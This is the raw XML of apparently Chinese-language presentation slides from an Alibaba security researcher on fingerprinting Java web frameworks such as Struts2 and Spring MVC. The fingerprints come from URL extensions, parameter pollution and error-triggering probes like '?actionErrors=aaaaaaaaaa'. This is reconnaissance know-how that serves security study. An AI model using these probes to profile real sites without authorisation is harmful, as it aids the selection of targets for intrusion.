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BC2E-73A3-4A0B-8100-C861F083FFCB}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>12-8-14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CC670-AB42-4C65-824F-E34E2E6DB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86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8548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11A063-68F3-4AC8-B2F7-562BBCF7040A}" type="slidenum">
              <a:rPr lang="zh-CN" alt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zh-CN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FFBEEA-1EEF-42B0-B01F-8B5415C97B24}" type="slidenum">
              <a:rPr lang="zh-CN" alt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zh-CN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059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FDB4C9-363E-4CEE-8ADB-763935C45D47}" type="slidenum">
              <a:rPr lang="zh-CN" alt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zh-CN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4F4EA6-D944-4279-9C37-3FBFEF426944}" type="slidenum">
              <a:rPr lang="zh-CN" alt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zh-CN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805965"/>
            <a:ext cx="7772400" cy="108023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49875"/>
            <a:ext cx="6400800" cy="113715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88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71208" y="1496824"/>
            <a:ext cx="7397891" cy="45259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79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85100" y="1417751"/>
            <a:ext cx="1963353" cy="460768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93459" y="1417751"/>
            <a:ext cx="5744626" cy="46076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94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592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2702" y="3795437"/>
            <a:ext cx="6895838" cy="166266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2702" y="1964176"/>
            <a:ext cx="6895838" cy="183126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1159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1159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27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47604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15803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47604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15803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5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42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98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599" cy="775495"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"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464637"/>
            <a:ext cx="5111750" cy="45608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819" y="251058"/>
            <a:ext cx="8169980" cy="748462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4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2311123"/>
            <a:ext cx="5486400" cy="371431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7" y="1377035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59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41375" y="0"/>
            <a:ext cx="75453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41375" y="1497013"/>
            <a:ext cx="7545388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430963"/>
            <a:ext cx="503238" cy="3587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000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑"/>
          <a:ea typeface="微软雅黑"/>
          <a:cs typeface="微软雅黑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bg1"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑"/>
          <a:ea typeface="微软雅黑"/>
          <a:cs typeface="微软雅黑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bg1"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑"/>
          <a:ea typeface="微软雅黑"/>
          <a:cs typeface="微软雅黑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bg1"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑"/>
          <a:ea typeface="微软雅黑"/>
          <a:cs typeface="微软雅黑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bg1"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑"/>
          <a:ea typeface="微软雅黑"/>
          <a:cs typeface="微软雅黑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bg1"/>
          </a:solidFill>
          <a:latin typeface="微软雅黑"/>
          <a:ea typeface="微软雅黑"/>
          <a:cs typeface="微软雅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olyplastics.com/v/n?i=933&amp;l=03&amp;s=1" TargetMode="Externa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攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JAVA WEB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56059" y="4149080"/>
            <a:ext cx="6400800" cy="1137154"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>阿里巴巴</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>集团安全中心 周拓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703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扩展名“*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.action”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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判断为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>webwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>，得分：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>90%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://www.inbreak.net/index.action</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>官方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各种教程书籍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28775"/>
            <a:ext cx="852805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1277938"/>
            <a:ext cx="5473700" cy="55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0131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预见未来</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044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使用后</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104452" name="图片 3" descr="E:\doc\my\myresearch\x\turbine\修改后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96543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预见未来</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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请大家一起见证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8780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Q &amp; A</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1064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thanks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20603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扩展名为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>*.do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>”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b="1" smtClean="0"/>
              <a:t>判断为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>spring mvc   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>得分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>50%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>http://www.inbreak.net/index.do</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>方向性判断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>官方文档</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>教程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>还有很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>struts1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>等）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13353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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>路径“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/action/xxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>”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b="1" smtClean="0"/>
              <a:t>判断为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>struts2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>得分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t> 70%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>http://www.inbreak.net/action/index</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>官方手册</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>字段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8778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扩展名为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>*.form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>”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看到一个表单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>判断为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>spring mvc  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>得分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>70%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>官方手册推荐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.NET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>偶尔也用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p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266825"/>
            <a:ext cx="9028112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1421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扩展名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>*.vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>”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判断为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>VelocityViewServlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>分值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>90%</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Velocity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Velocity tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>教程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Turbine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>spring mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>都可能使用</a:t>
            </a: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200150"/>
            <a:ext cx="6551612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4114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扩展名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>*.jsf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>”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Java Server Faces   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>得分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>99%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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1413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参数处理方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目录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Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>类型参数处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>一个参数，直接显示错误页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>spring mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>有个怪习惯</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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51140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 string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>类型参数处理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b="1" smtClean="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>框架安全缺陷》</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>HTTP Parameter Pollution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>》</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>?username=aaa&amp;username=bbb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>&lt;input value="aaa, bbb" name="username" type="text" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>得分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>95%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02709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一个参数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>错误页面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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所有的用户定义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>Action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>都继承这个类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>Action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>setter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2663825" y="2924175"/>
            <a:ext cx="3276600" cy="1225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ActionSupport</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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65500" y="5122863"/>
            <a:ext cx="1873250" cy="935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action1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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4167188" y="4160838"/>
            <a:ext cx="269875" cy="9366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126254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一个参数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>错误页面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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ActionSupport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>验证逻辑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" y="2492375"/>
            <a:ext cx="91154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3338" y="2492375"/>
            <a:ext cx="1212850" cy="7207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4075" y="2500313"/>
            <a:ext cx="2879725" cy="7191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44598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个人介绍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周拓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阿里巴巴集团安全中心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网名：空虚浪子心、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>kxlzx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>4700012 (&amp;EMAIL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>个人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>BLOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://www.inbreak.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>微</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>博</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://t.qq.com/javasecurity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84504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一个参数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>错误页面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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?actionErrors=aaaaaaaaaa</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p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2276475"/>
            <a:ext cx="91694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843213" y="2852738"/>
            <a:ext cx="1214437" cy="7207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463" y="3454400"/>
            <a:ext cx="2808287" cy="7207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2425" y="4267200"/>
            <a:ext cx="5899150" cy="1728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100%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>确认，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struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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6749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spring mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>有个怪习惯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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spring mvc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Spring tag lib</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>checkbox</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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7950" y="2776538"/>
          <a:ext cx="8928100" cy="2511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28100"/>
              </a:tblGrid>
              <a:tr h="25114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0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4000" b="0" kern="1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form:form</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="40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 </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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0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4000" b="1" kern="1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form:checkbox</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="40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path="favorites" value="1"/&gt;computer </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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0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&lt;/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="0" kern="1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form:form</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="40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&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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73" marR="68573" marT="0" marB="0"/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00226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spring mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>有个怪习惯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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&lt;input id="favorites1" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5800" b="1" dirty="0" smtClean="0"/>
              <a:t>favorites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>" type="checkbox" value="1"/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;input type="hidden" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0"/>
              <a:t>_favorites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3500" b="1" dirty="0" smtClean="0"/>
              <a:t>" value="on"/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>computer </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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2589684" y="2060848"/>
            <a:ext cx="4227512" cy="7191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42967" y="4382589"/>
            <a:ext cx="5184775" cy="7921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3864174"/>
            <a:ext cx="6769100" cy="1728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90%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>确认，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spring mvc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="32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8857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spring mvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>有个怪习惯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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</a:t>
            </a:r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33600"/>
            <a:ext cx="8280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716463" y="2141538"/>
            <a:ext cx="1212850" cy="5667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2103438"/>
